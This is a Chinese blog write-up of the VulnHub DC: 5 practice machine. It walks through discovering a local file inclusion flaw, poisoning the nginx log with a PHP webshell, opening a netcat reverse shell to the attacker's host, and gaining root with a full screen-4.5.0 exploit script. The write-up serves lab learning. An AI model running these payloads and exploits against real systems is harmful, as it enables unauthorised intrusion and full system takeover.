[資訊安全] VulnHub – DC: 5 Write-up

MksYi Linux, VulnHub, 作業系統, 滲透測試, 資訊安全, 電腦系統
Photo by Almos Bechtold on Unsplash

DC 系列的第五題,該題 DC: 5 也是目前為止花費最多時間的一題,過程中也更為基礎加固、更扎實些,資安的學習也真的是需要不斷的經驗累積,涉及廣闊,不大可能樣樣精通,只有大量累積經驗、吸收關鍵字、刺激思維,才能夠因應各種環境逐一挖掘弱點。

環境設定

VirtualBox: Kali & DC: 5
Net Config: NAT Network

尋找靶機

$ nmap 10.0.2.1/24 -sP 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 17:49 CST
Nmap scan report for 10.0.2.1
Host is up (0.0049s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0088s latency).
Nmap scan report for 10.0.2.11
Host is up (0.0013s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00040s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.56 seconds

$ nmap 10.0.2.11 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 17:49 CST
Nmap scan report for 10.0.2.11
Host is up (0.0024s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38053/tcp   status
|   100024  1          52396/tcp6  status
|   100024  1          57321/udp6  status
|_  100024  1          58274/udp   status
38053/tcp open  status  1 (RPC #100024)

解題過程

Wappalyzer

首先瀏覽 Port 80 感覺上是一個簡易的 CMS 服務,透過 Wappalyzer 沒有什麼發現。

目錄爆破

緊接著透過 drisearch 進行目錄爆破,同樣沒有什麼發現。

$ python3 dirsearch.py -u http://10.0.2.11/ -w db/all.txt -e php 

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| ) 

Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 86760

Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-02-03_10-24-34.log

Target: http://10.0.2.11/                                                       
Output File: /home/mksyi/下載/dirsearch/reports/10.0.2.11/_21-02-03_10-24-34.txt

[10:24:34] Starting: 
[10:24:41] 301 -  184B  - /images/ 
[10:24:48] 403 -  570B  - /css/
[10:24:58] 200 -    4KB - /solutions.php
[10:25:13] 200 -    4KB - /index.php
[10:25:33] 200 -  852B  - /thankyou.php
[10:25:40] 200 -    6KB - /faq.php
[10:26:26] 200 -   17B  - /footer.php
[10:26:33] 200 -    4KB - /contact.php                                            
Task Completed

LFI

經過一系列的探勘,有功能的部分僅有 contact.phpthankyou.php 兩個頁面,其中有想過,會不會是透過 contact.php 聯繫站長,並藉機 XSS 攻擊,但 submit 後,頁面僅僅使用 GET 轉跳到 thankyou.php 頁面,甚至我還裝 Beef 工具進行嘗試,顯然沒有任何進展。

之後在 thankyou.php 頁面發現底部的月份會隨著重新整理不斷變化。

第一時間看到 footer 的變化,僅覺得可能是 Load Balance 機制,並沒有其他想法,但隨著時間拉長,皆沒有新的發現與突破,心想不會這麼通靈吧…,直到用了 fuzz 把 thankyou.php 的參數名稱爆了一輪,發現 /thankyou.php?file 的結果與其他不同。

  • –hh 851: 隱藏條件 Chars 字數為 851 的項目

由於名稱為 file 的直覺,直接使用 /etc/passwd 來嘗試,結果真的把檔案讀出來了,於是挖掘出一個 LFI(Local File inclusion) 弱點。

VulnHub – DC: 5 LFI

透過 PHP 偽協議取得 thankyou.php 的原始碼,其中比較關鍵的程式碼如下。

http://10.0.2.11/thankyou.php?file=php://filter/convert.base64-encode/resource=thankyou.php

<?php
    $file = $_GET['file'];
        if(isset($file))
        {
            include("$file");
        }
        else
        {
            include("footer.php");
        }
?>

Get Shell

透過 LFI 探看發現 nginx 的設定檔位置為 /etc/nginx/nginx.conf,獲得 Logs 的存放位置為 /var/log/nginx/{access|error}.log,可以藉由 log 紀錄進行寫入,藉此把 PHP Code 寫到 log 中,再藉由 LFI 讀取 Log 檔,由於 include 會針對 <?php ?> 標籤內的內容進行解析,藉此來完成「寫檔」、「讀檔」、「執行」。

預設的 nginx 設定擋路徑參考:How to Configure NGINX

上傳 Shell

首先可以決定要產生「正常」或「錯誤」的 Log,以正常的 Log 為例,雖然回應 404,但非伺服器端錯誤(500),所以 Log 會寫至 access.log 中。

http://10.0.2.11/AAA<?php echo system($_POST['cmd']); ?>
VulnHub – DC: 5 Write Log

這邊踩了一個坑,由於太習慣用 Hackbar 送 Payload,導致送出的 Payload 被瀏覽器做一層 URLencode,然後也不知道怎麼誤打誤撞的成功過一次,之後就執著於此,要再次復現就困難重重,並不斷迴圈,甚至還重佈了幾次靶機,最後同事說用 Burp 送,Burp 丟出來的東西是最原始的,然後就成功把 Webshell 寫進 Log 了。

取得 Shell

Listen

nc -nl -vv -p 8888

Victim

nc -e /bin/sh 10.0.2.15 8888
VulnHub – DC: 5 Get Shell
python -c "import pty;pty.spawn('/bin/bash')"

提權

Linux exploit sugester

透過 linux-exploit-suggester 快速分析出可能存在的 Exploit。

www-data@dc-5:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
www-data@dc-5:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 3.16.0
Architecture: x86_64
Distribution: debian
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

74 kernel space exploits
46 user space exploits

Possible Exploits:

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-1247] nginxed-root.sh

   Details: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
   Exposure: probable
   Tags: [ debian=8 ],ubuntu=14.04|16.04|16.10
   Download URL: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
   Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2015-9322] BadIRET

   Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
   Exposure: less probable
   Tags: RHEL<=7,fedora=20
   Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
   Download URL: https://www.exploit-db.com/download/39166

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/39230

[+] [CVE-2015-3290] espfix64_NMI

   Details: http://www.openwall.com/lists/oss-security/2015/08/04/8
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/37722

[+] [CVE-2015-1328] overlayfs

   Details: http://seclists.org/oss-sec/2015/q2/717
   Exposure: less probable
   Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
   Download URL: https://www.exploit-db.com/download/37292

[+] [CVE-2014-5207] fuse_suid

   Details: https://www.exploit-db.com/exploits/34923/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/34923

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working

SUID check

www-data@dc-5:/tmp$ find / -user root -perm -4000 -print 2>/dev/null 
find / -user root -perm -4000 -print 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

Get Root

透過以上資訊蒐集得到系統上可能存在 dirtycow 漏洞,但經過嘗試無法成功編譯,於是看到 SUID 的部分含有一支可疑的程式 screen-4.5.0,於是找到了 CVE-2017-5618 弱點,但發現他的 PoC 好像末端都藏有一個隱藏字元,若沒清掉無法直接使用,還好只是小小的 sh 檔,複製貼上拆出來跑就行。

cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF

gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
# whoami
root

cc1 導致無法編譯問題

這邊感謝同事支援,在 Reverse shell 底下,若要直接使用 gcc 進行編譯,則會噴出找不到 cc1 的問題,為了解決這個問題使用 export PATH=$PATH 指令來搞定,據同事大大的分析與猜測指出,該址指令是把「環境變數」寫到「區域變數」,至於在執行前輸入 $PATH 是含有 gcc 資訊的,至於為什麼需要手動重新賦值,主要原因可能是因為在 Reverse shell 下導致 Shell 在 Fork 時,區域變數沒有被賦值。

$ gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
gcc: error trying to exec 'cc1': execvp: No such file or directory

感恩 Z大 讚嘆 Z大

Flag

# cat /root/thisistheflag.txt

888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 

Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

MksYi

透過網路分享知識的學習者。

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

This site uses Akismet to reduce spam. Learn how your comment data is processed.